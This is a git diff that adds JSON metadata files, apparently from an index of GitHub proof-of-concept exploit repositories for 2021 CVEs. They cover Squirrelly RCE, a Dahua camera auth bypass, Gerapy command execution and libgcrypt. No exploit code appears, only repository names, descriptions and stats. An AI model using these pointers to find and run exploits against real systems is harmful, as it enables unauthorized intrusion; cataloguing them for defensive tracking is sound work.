b/2021/CVE-2021-32819.json new file mode 100644 index 0000000000..bd8e23faad --- /dev/null +++ b/2021/CVE-2021-32819.json @@ -0,0 +1,33 @@ +[ + { + "id": 376344697, + "name": "CVE-2021-32819", + "full_name": "Abady0x1\/CVE-2021-32819", + "owner": { + "login": "Abady0x1", + "id": 42253363, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42253363?v=4", + "html_url": "https:\/\/github.com\/Abady0x1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Abady0x1\/CVE-2021-32819", + "description": "SquirrellyJS mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options, remote code execution may be triggered in downstream applications.", + "fork": false, + "created_at": "2021-06-12T17:09:48Z", + "updated_at": "2024-06-21T09:59:35Z", + "pushed_at": "2021-06-12T17:17:41Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-32849.json b/2021/CVE-2021-32849.json new file mode 100644 index 0000000000..2ffe0ad5b3 --- /dev/null +++ b/2021/CVE-2021-32849.json @@ -0,0 +1,64 @@ +[ + { + "id": 438109831, + "name": "CVE-2021-32849", + "full_name": "bb33bb\/CVE-2021-32849", + "owner": { + "login": "bb33bb", + "id": 5463104, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5463104?v=4", + "html_url": "https:\/\/github.com\/bb33bb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bb33bb\/CVE-2021-32849", + "description": "Gerapy clone background remote command execution", + "fork": false, + "created_at": "2021-12-14T03:53:55Z", + "updated_at": "2022-04-03T09:26:19Z", + "pushed_at": "2021-11-29T06:41:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 485253196, + "name": "cve-2021-32849", + "full_name": "lowkey0808\/cve-2021-32849", + "owner": { + "login": "lowkey0808", + "id": 49674960, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49674960?v=4", + "html_url": "https:\/\/github.com\/lowkey0808", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lowkey0808\/cve-2021-32849", + "description": "cve-2021-32849(gerapy命令执行)", + "fork": false, + "created_at": "2022-04-25T06:44:46Z", + "updated_at": "2023-09-16T19:27:23Z", + "pushed_at": "2022-04-25T06:50:08Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-3291.json b/2021/CVE-2021-3291.json new file mode 100644 index 0000000000..210cd1b8b0 --- /dev/null +++ b/2021/CVE-2021-3291.json @@ -0,0 +1,33 @@ +[ + { + "id": 361407419, + "name": "CVE-2021-3291", + "full_name": "ImHades101\/CVE-2021-3291", + "owner": { + "login": "ImHades101", + "id": 52188500, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52188500?v=4", + "html_url": "https:\/\/github.com\/ImHades101", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ImHades101\/CVE-2021-3291", + "description": "rebuild cve", + "fork": false, + "created_at": "2021-04-25T11:18:09Z", + "updated_at": "2022-11-09T18:12:04Z", + "pushed_at": "2021-04-25T11:42:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-33026.json b/2021/CVE-2021-33026.json new file mode 100644 index 0000000000..09e97e71e8 --- /dev/null +++ b/2021/CVE-2021-33026.json @@ -0,0 +1,64 @@ +[ + { + "id": 425043477, + "name": "CVE-2021-33026", + "full_name": "CarlosG13\/CVE-2021-33026", + "owner": { + "login": "CarlosG13", + "id": 69405457, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69405457?v=4", + "html_url": "https:\/\/github.com\/CarlosG13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CarlosG13\/CVE-2021-33026", + "description": "Pickle Serialization Remote Code Execution - Memcached Poisoning", + "fork": false, + "created_at": "2021-11-05T18:11:54Z", + "updated_at": "2024-10-30T17:18:32Z", + "pushed_at": "2021-11-05T21:04:59Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 869670698, + "name": "FlaskCache_CVE-2021-33026_POC", + "full_name": "Agilevatester\/FlaskCache_CVE-2021-33026_POC", + "owner": { + "login": "Agilevatester", + "id": 170657414, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/170657414?v=4", + "html_url": "https:\/\/github.com\/Agilevatester", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Agilevatester\/FlaskCache_CVE-2021-33026_POC", + "description": null, + "fork": false, + "created_at": "2024-10-08T17:27:56Z", + "updated_at": "2024-10-08T18:31:43Z", + "pushed_at": "2024-10-08T18:31:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-33034.json b/2021/CVE-2021-33034.json new file mode 100644 index 0000000000..8d8b63610f --- /dev/null +++ b/2021/CVE-2021-33034.json @@ -0,0 +1,33 @@ +[ + { + "id": 486540482, + "name": "device_renesas_kernel_AOSP10_r33_CVE-2021-33034", + "full_name": "Trinadh465\/device_renesas_kernel_AOSP10_r33_CVE-2021-33034", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/device_renesas_kernel_AOSP10_r33_CVE-2021-33034", + "description": null, + "fork": false, + "created_at": "2022-04-28T10:04:41Z", + "updated_at": "2023-03-08T01:53:20Z", + "pushed_at": "2022-04-28T10:41:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-33044.json b/2021/CVE-2021-33044.json new file mode 100644 index 0000000000..194f068917 --- /dev/null +++ b/2021/CVE-2021-33044.json @@ -0,0 +1,126 @@ +[ + { + "id": 416101106, + "name": "DahuaLoginBypass", + "full_name": "bp2008\/DahuaLoginBypass", + "owner": { + "login": "bp2008", + "id": 5639911, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5639911?v=4", + "html_url": "https:\/\/github.com\/bp2008", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bp2008\/DahuaLoginBypass", + "description": "Chrome extension that uses vulnerabilities CVE-2021-33044 and CVE-2021-33045 to log in to Dahua cameras without authentication.", + "fork": false, + "created_at": "2021-10-11T22:08:47Z", + "updated_at": "2024-11-19T21:56:04Z", + "pushed_at": "2021-10-13T22:32:36Z", + "stargazers_count": 131, + "watchers_count": 131, + "has_discussions": false, + "forks_count": 31, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 31, + "watchers": 131, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 418578582, + "name": "CVE-2021-33044", + "full_name": "Spy0x7\/CVE-2021-33044", + "owner": { + "login": "Spy0x7", + "id": 51508718, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51508718?v=4", + "html_url": "https:\/\/github.com\/Spy0x7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Spy0x7\/CVE-2021-33044", + "description": "Dahua IPC\/VTH\/VTO devices auth bypass exploit", + "fork": false, + "created_at": "2021-10-18T16:17:05Z", + "updated_at": "2021-10-18T16:17:07Z", + "pushed_at": "2021-10-18T16:09:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 462035961, + "name": "alonzzzo", + "full_name": "Alonzozzz\/alonzzzo", + "owner": { + "login": "Alonzozzz", + "id": 100165245, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100165245?v=4", + "html_url": "https:\/\/github.com\/Alonzozzz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Alonzozzz\/alonzzzo", + "description": "Changelog CVE-2021-33044,CVE-2021-33045 Identity authentication bypass vulnerability found in some Dahua products CVE-2021-27248,CVE-2021-27249,CVE-2021-27250,CVE-2021-34860,CVE-2021-34861,CVE-2021-34862,CVE-2021-34863 Multiple vulnerabilities in DAP-2020 H\/W rev. Ax with F\/W v1.01 and below HTTP Path Traversal CVE-2019-7406 RCE vulnerability in TP-Link Wi-Fi Extenders via a malformed user agent field in HTTP headers CVE-2020-2501,CVE-2021-28797 Stack Buffer Overflow in QNAP Surveillance Station CVE-2021-34730 Critical UPnP Service Flaw on Cisco Small Business RV Series Routers CVE-2020-35785 Multiple HTTP authentication vulnerabilities on DGN2200v1", + "fork": false, + "created_at": "2022-02-21T21:22:43Z", + "updated_at": "2022-02-21T21:22:43Z", + "pushed_at": "2022-02-21T21:23:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 708416982, + "name": "LoHongCam-CVE-2021-33044", + "full_name": "haingn\/LoHongCam-CVE-2021-33044", + "owner": { + "login": "haingn", + "id": 52133074, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52133074?v=4", + "html_url": "https:\/\/github.com\/haingn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/haingn\/LoHongCam-CVE-2021-33044", + "description": null, + "fork": false, + "created_at": "2023-10-22T14:02:49Z", + "updated_at": "2023-10-22T14:06:32Z", + "pushed_at": "2023-10-22T14:03:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-33045.json b/2021/CVE-2021-33045.json new file mode 100644 index 0000000000..76321d5b65 --- /dev/null +++ b/2021/CVE-2021-33045.json @@ -0,0 +1,33 @@ +[ + { + "id": 415978923, + "name": "cve-2021-33045", + "full_name": "dongpohezui\/cve-2021-33045", + "owner": { + "login": "dongpohezui", + "id": 40270581, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40270581?v=4", + "html_url": "https:\/\/github.com\/dongpohezui", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dongpohezui\/cve-2021-33045", + "description": null, + "fork": false, + "created_at": "2021-10-11T15:11:48Z", + "updated_at": "2023-11-27T02:34:15Z", + "pushed_at": "2021-10-11T15:23:39Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-3310.json b/2021/CVE-2021-3310.json new file mode 100644 index 0000000000..6a4231b768 --- /dev/null +++ b/2021/CVE-2021-3310.json @@ -0,0 +1,33 @@ +[ + { + "id": 370482537, + "name": "CVE-2021-3310", + "full_name": "piffd0s\/CVE-2021-3310", + "owner": { + "login": "piffd0s", + "id": 7329476, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7329476?v=4", + "html_url": "https:\/\/github.com\/piffd0s", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/piffd0s\/CVE-2021-3310", + "description": "Western Digital MyCloud PR4100 Link Resolution Information Disclosure Vulnerability", + "fork": false, + "created_at": "2021-05-24T20:55:33Z", + "updated_at": "2021-06-21T02:06:49Z", + "pushed_at": "2021-05-24T21:05:52Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-33104.json b/2021/CVE-2021-33104.json new file mode 100644 index 0000000000..20914d3fd5 --- /dev/null +++ b/2021/CVE-2021-33104.json @@ -0,0 +1,33 @@ +[ + { + "id": 614247020, + "name": "CVE-2021-33104", + "full_name": "rjt-gupta\/CVE-2021-33104", + "owner": { + "login": "rjt-gupta", + "id": 35985127, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35985127?v=4", + "html_url": "https:\/\/github.com\/rjt-gupta", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rjt-gupta\/CVE-2021-33104", + "description": "CVE-2021-33104 - Improper access control in the Intel(R) OFU software", + "fork": false, + "created_at": "2023-03-15T07:45:02Z", + "updated_at": "2023-06-01T01:05:24Z", + "pushed_at": "2023-03-15T07:46:21Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-3317.json b/2021/CVE-2021-3317.json new file mode 100644 index 0000000000..798256adcc --- /dev/null +++ b/2021/CVE-2021-3317.json @@ -0,0 +1,37 @@ +[ + { + "id": 356180253, + "name": "CVE-2021-3317", + "full_name": "Al1ex\/CVE-2021-3317", + "owner": { + "login": "Al1ex", + "id": 38161463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4", + "html_url": "https:\/\/github.com\/Al1ex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Al1ex\/CVE-2021-3317", + "description": "CVE-2021-3317", + "fork": false, + "created_at": "2021-04-09T07:36:46Z", + "updated_at": "2024-08-12T20:11:59Z", + "pushed_at": "2021-04-09T07:37:29Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-3317", + "exploit", + "klogserver" + ], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-3345.json b/2021/CVE-2021-3345.json new file mode 100644 index 0000000000..d805348127 --- /dev/null +++ b/2021/CVE-2021-3345.json @@ -0,0 +1,73 @@ +[ + { + "id": 334617977, + "name": "CVE-2021-3345", + "full_name": "MLGRadish\/CVE-2021-3345", + "owner": { + "login": "MLGRadish", + "id": 23532098, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23532098?v=4", + "html_url": "https:\/\/github.com\/MLGRadish", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MLGRadish\/CVE-2021-3345", + "description": "POC exploit of CVE-2021-3345, a vulnerability in libgcrypt version 1.9.0", + "fork": false, + "created_at": "2021-01-31T09:28:14Z", + "updated_at": "2024-05-09T10:53:08Z", + "pushed_at": "2021-02-07T02:40:38Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2021-3345", + "exploit", + "exploit-development", + "exploits", + "libgcrypt", + "poc", + "vulnerability" + ], + "visibility": "public", + "forks": 3, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 765419523, + "name": "CVE-2021-3345", + "full_name": "SpiralBL0CK\/CVE-2021-3345", + "owner": { + "login": "SpiralBL0CK", + "id": 25670930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25670930?v=4", + "html_url": "https:\/\/github.com\/SpiralBL0CK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SpiralBL0CK\/CVE-2021-3345", + "description": "Actual working exploit for CVE-2021-3345", + "fork": false, + "created_at": "2024-02-29T22:05:44Z", + "updated_at": "2024-07-01T20:32:20Z", + "pushed_at": "2024-02-29T22:22:22Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-3347.json b/2021/CVE-2021-3347.json new file mode 100644 index 0000000000..999d9faa5e --- /dev/null +++ b/2021/CVE-2021-3347.json @@ -0,0 +1,33 @@ +[ + { + "id": 485757844, + "name": "linux-4.19.72_CVE-2021-3347", + "full_name": "nanopathi\/linux-4.19.72_CVE-2021-3347", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/linux-4.19.72_CVE-2021-3347", + "description": null, + "fork": false, + "created_at": "2022-04-26T11:32:34Z", + "updated_at": "2022-04-26T12:12:00Z", + "pushed_at": "2023-10-26T12:57:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-33558.json b/2021/CVE-2021-33558.json new file mode 100644 index 0000000000..79cbc91365 --- /dev/null +++ b/2021/CVE-2021-33558.json @@ -0,0 +1,64 @@ +[ + { + "id": 370638345, + "name": "CVE-2021-33558.", + "full_name": "mdanzaruddin\/CVE-2021-33558.", + "owner": { + "login": "mdanzaruddin", + "id": 48306735, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48306735?v=4", + "html_url": "https:\/\/github.com\/mdanzaruddin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mdanzaruddin\/CVE-2021-33558.", + "description": null, + "fork": false, + "created_at": "2021-05-25T09:33:21Z", + "updated_at": "2023-03-05T06:15:23Z", + "pushed_at": "2021-05-25T09:42:00Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 571407040, + "name": "CVE-2021-33558", + "full_name": "anldori\/CVE-2021-33558", + "owner": { + "login": "anldori", + "id": 101538840, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101538840?v=4", + "html_url": "https:\/\/github.com\/anldori", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/anldori\/CVE-2021-33558", + "description": "CVE-2021-33558 POC", + "fork": false, + "created_at": "2022-11-28T03:50:10Z", + "updated_at": "2022-11-29T04:29:20Z", + "pushed_at": "2022-11-28T03:52:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-33560.json b/2021/CVE-2021-33560.json new file mode 100644 index 0000000000..00a8cc67f4 --- /dev/null +++ b/2021/CVE-2021-33560.json @@ -0,0 +1,33 @@ +[ + { + "id": 386681813, + "name": "PGP-client-checker-CVE-2021-33560", + "full_name": "IBM\/PGP-client-checker-CVE-2021-33560", + "owner": { + "login": "IBM", + "id": 1459110, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1459110?v=4", + "html_url": "https:\/\/github.com\/IBM", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/IBM\/PGP-client-checker-CVE-2021-33560", + "description": "Tool to check whether a PGP client is affected by CVE-2021-33560", + "fork": false, + "created_at": "2021-07-16T15:24:11Z", + "updated_at": "2023-07-19T16:23:56Z", + "pushed_at": "2023-07-19T16:23:49Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 6 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-33564.json b/2021/CVE-2021-33564.json new file mode 100644 index 0000000000..7c35f3b87e --- /dev/null +++ b/2021/CVE-2021-33564.json @@ -0,0 +1,64 @@ +[ + { + "id": 370544854, + "name": "CVE-2021-33564", + "full_name": "mlr0p\/CVE-2021-33564", + "owner": { + "login": "mlr0p", + "id": 36525379, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36525379?v=4", + "html_url": "https:\/\/github.com\/mlr0p", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mlr0p\/CVE-2021-33564", + "description": "Argument Injection in Dragonfly Ruby Gem", + "fork": false, + "created_at": "2021-05-25T02:48:08Z", + "updated_at": "2024-05-06T05:09:25Z", + "pushed_at": "2021-05-26T21:30:29Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 16, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 371425844, + "name": "CVE-2021-33564", + "full_name": "dorkerdevil\/CVE-2021-33564", + "owner": { + "login": "dorkerdevil", + "id": 15796745, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15796745?v=4", + "html_url": "https:\/\/github.com\/dorkerdevil", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dorkerdevil\/CVE-2021-33564", + "description": "Argument Injection in Dragonfly Ruby Gem exploit (backup)", + "fork": false, + "created_at": "2021-05-27T15:44:45Z", + "updated_at": "2024-08-12T20:13:24Z", + "pushed_at": "2021-05-27T15:45:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-3360.json b/2021/CVE-2021-3360.json new file mode 100644 index 0000000000..12f9515e6e --- /dev/null +++ b/2021/CVE-2021-3360.json @@ -0,0 +1,33 @@ +[ + { + "id": 360354308, + "name": "CVE-2021-3360", + "full_name": "tcbutler320\/CVE-2021-3360", + "owner": { + "login": "tcbutler320", + "id": 41709108, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41709108?v=4", + "html_url": "https:\/\/github.com\/tcbutler320", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tcbutler320\/CVE-2021-3360", + "description": null, + "fork": false, + "created_at": "2021-04-22T01:17:37Z", + "updated_at": "2021-08-20T10:07:52Z", + "pushed_at": "2021-04-22T01:38:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-33624.json b/2021/CVE-2021-33624.json new file mode 100644 index 0000000000..cf09f3ca6a --- /dev/null +++ b/2021/CVE-2021-33624.json @@ -0,0 +1,33 @@ +[ + { + "id": 380365358, + "name": "CVE-2021-33624", + "full_name": "benschlueter\/CVE-2021-33624", + "owner": { + "login": "benschlueter", + "id": 25753058, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25753058?v=4", + "html_url": "https:\/\/github.com\/benschlueter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/benschlueter\/CVE-2021-33624", + "description": "Proof of Concept for CVE-2021-33624", + "fork": false, + "created_at": "2021-06-25T22:19:38Z", + "updated_at": "2022-12-23T17:12:21Z", + "pushed_at": "2021-08-02T07:24:02Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-33690.json b/2021/CVE-2021-33690.json new file mode 100644 index 0000000000..c346b09d23 --- /dev/null +++ b/2021/CVE-2021-33690.json @@ -0,0 +1,37 @@ +[ + { + "id": 648119155, + "name": "CVE-2021-33690", + "full_name": "redrays-io\/CVE-2021-33690", + "owner": { + "login": "redrays-io", + "id": 89958617, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89958617?v=4", + "html_url": "https:\/\/github.com\/redrays-io", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/redrays-io\/CVE-2021-33690", + "description": "[CVE-2021-33690] Server Side Request Forgery vulnerability in SAP NetWeaver Development Infrastructure", + "fork": false, + "created_at": "2023-06-01T08:49:55Z", + "updated_at": "2023-06-01T08:53:09Z", + "pushed_at": "2023-06-01T08:54:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-33690", + "sap", + "ssrf" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-33699.json b/2021/CVE-2021-33699.json new file mode 100644 index 0000000000..abb2c596bf --- /dev/null +++ b/2021/CVE-2021-33699.json @@ -0,0 +1,33 @@ +[ + { + "id": 835749772, + "name": "CVE-2021-33699_Task_Hijacking", + "full_name": "naroSEC\/CVE-2021-33699_Task_Hijacking", + "owner": { + "login": "naroSEC", + "id": 89144246, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89144246?v=4", + "html_url": "https:\/\/github.com\/naroSEC", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/naroSEC\/CVE-2021-33699_Task_Hijacking", + "description": null, + "fork": false, + "created_at": "2024-07-30T13:06:59Z", + "updated_at": "2024-07-31T16:34:38Z", + "pushed_at": "2024-07-31T16:34:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-33739.json b/2021/CVE-2021-33739.json new file mode 100644 index 0000000000..19058d2727 --- /dev/null +++ b/2021/CVE-2021-33739.json @@ -0,0 +1,64 @@ +[ + { + "id": 375334387, + "name": "CVE-2021-33739-POC", + "full_name": "freeide2017\/CVE-2021-33739-POC", + "owner": { + "login": "freeide2017", + "id": 33774427, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33774427?v=4", + "html_url": "https:\/\/github.com\/freeide2017", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/freeide2017\/CVE-2021-33739-POC", + "description": null, + "fork": false, + "created_at": "2021-06-09T11:40:56Z", + "updated_at": "2024-08-27T02:27:45Z", + "pushed_at": "2021-06-09T06:58:20Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 56, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 56, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 409820289, + "name": "CVE-2021-33739_PoC_Analysis", + "full_name": "giwon9977\/CVE-2021-33739_PoC_Analysis", + "owner": { + "login": "giwon9977", + "id": 66773292, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66773292?v=4", + "html_url": "https:\/\/github.com\/giwon9977", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/giwon9977\/CVE-2021-33739_PoC_Analysis", + "description": "CVE-2021-33739 PoC Analysis", + "fork": false, + "created_at": "2021-09-24T03:33:02Z", + "updated_at": "2024-05-20T17:12:20Z", + "pushed_at": "2021-12-22T09:04:01Z", + "stargazers_count": 5, + "watchers_count": 5, 